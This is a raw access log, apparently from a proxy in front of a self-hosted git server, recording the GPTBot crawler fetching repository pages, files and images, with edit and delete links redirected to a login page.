- 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.gitignore?display=source" [Client 74.7.227.38] [Length 12221] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.gitignore" -[17/Feb/2026:15:41:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/claude.md?display=source" [Client 74.7.227.38] [Length 15343] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/claude.md" -[17/Feb/2026:15:41:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/claude.md?display=rendered" [Client 74.7.227.38] [Length 13412] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/claude.md" -[17/Feb/2026:15:41:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker?display=rendered" [Client 74.7.227.38] [Length 16001] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" -[17/Feb/2026:15:41:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 11083] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" -[17/Feb/2026:15:41:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 11077] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" -[17/Feb/2026:15:41:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/QUICKSTART.md?display=source" [Client 74.7.227.38] [Length 15161] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:15:41:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/README.md?display=rendered" [Client 74.7.227.38] [Length 13313] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/README.md" -[17/Feb/2026:15:41:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 47757] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:15:41:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 20545] [Gzip 6.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" -[17/Feb/2026:15:41:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 17886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:15:41:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 14466] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" -[17/Feb/2026:15:41:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 15042] [Gzip 4.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" -[17/Feb/2026:15:42:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 20895] [Gzip 7.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -[17/Feb/2026:15:42:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 40912] [Gzip 9.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -[17/Feb/2026:15:42:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/reactor.png" -[17/Feb/2026:15:42:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/reactor.png" -[17/Feb/2026:15:42:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/bearing.png" -[17/Feb/2026:15:42:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/bearing.png" -[17/Feb/2026:15:42:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/bearing.png" -[17/Feb/2026:15:42:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/bearing.png" -[17/Feb/2026:15:42:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/reactor.png" -[17/Feb/2026:15:42:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/reactor.png" -[17/Feb/2026:15:42:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/reactor.png?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/reactor.png" -[17/Feb/2026:15:42:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/bearing.png?display=rendered" [Client 74.7.227.38] [Length 11071] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/bearing.png" -[17/Feb/2026:15:42:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 938] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/reactor.png" -[17/Feb/2026:15:42:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 10147] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:15:42:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 14748] [Gzip 6.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:15:42:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 10520] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:15:42:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 55707] [Gzip 15.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:15:42:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 10703] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:15:42:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 25395] [Gzip 11.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:15:42:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/bearing.png" -[17/Feb/2026:15:42:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/reactor.png" -[17/Feb/2026:15:42:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 938] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/bearing.png" -[17/Feb/2026:15:42:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 20146] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:15:42:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 74625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:15:42:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 170071] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:15:42:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs?display=source" [Client 74.7.227.38] [Length 13938] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs" -[17/Feb/2026:15:42:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=npm%2fdata%2flogs%2ffallback_http_error.log" [Client 74.7.227.38] [Length 21838] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:15:42:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/database.sqlite" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/database.sqlite" -[17/Feb/2026:15:42:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/database.sqlite" -[17/Feb/2026:15:42:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=npm%2fdata%2flogs%2ffallback_http_access.log" [Client 74.7.227.38] [Length 28017] [Gzip 6.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:15:42:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good?display=rendered" [Client 74.7.227.38] [Length 10901] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good" -[17/Feb/2026:15:42:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12764] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx" -[17/Feb/2026:15:42:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10871] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx" -[17/Feb/2026:15:42:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html?display=rendered" [Client 74.7.227.38] [Length 14257] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" -[17/Feb/2026:15:42:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=mostcomplete&state=closed" [Client 74.7.227.38] [Length 8511] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=mostcomplete&state=open" -[17/Feb/2026:15:42:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=leastcomplete&state=all" [Client 74.7.227.38] [Length 8488] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=leastcomplete&state=open" -[17/Feb/2026:15:42:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=mostissues&state=closed" [Client 74.7.227.38] [Length 8502] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=mostissues&state=open" -[17/Feb/2026:15:42:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=leastissues&state=closed" [Client 74.7.227.38] [Length 8502] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=leastissues&state=open" -[17/Feb/2026:15:42:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=leastcomplete&state=closed" [Client 74.7.227.38] [Length 8506] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=leastcomplete&state=open" -[17/Feb/2026:15:42:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" [Client 74.7.227.38] [Length 16488] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot" -[17/Feb/2026:15:42:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/claude.md?display=rendered" [Client 74.7.227.38] [Length 13448] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/claude.md" -[17/Feb/2026:15:42:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/QUICKSTART.md?display=source" [Client 74.7.227.38] [Length 15201] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:15:42:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/claude.md?display=source" [Client 74.7.227.38] [Length 15382] [Gzip 4.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/claude.md" -[17/Feb/2026:15:42:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10563] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:42:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10567] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:42:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr 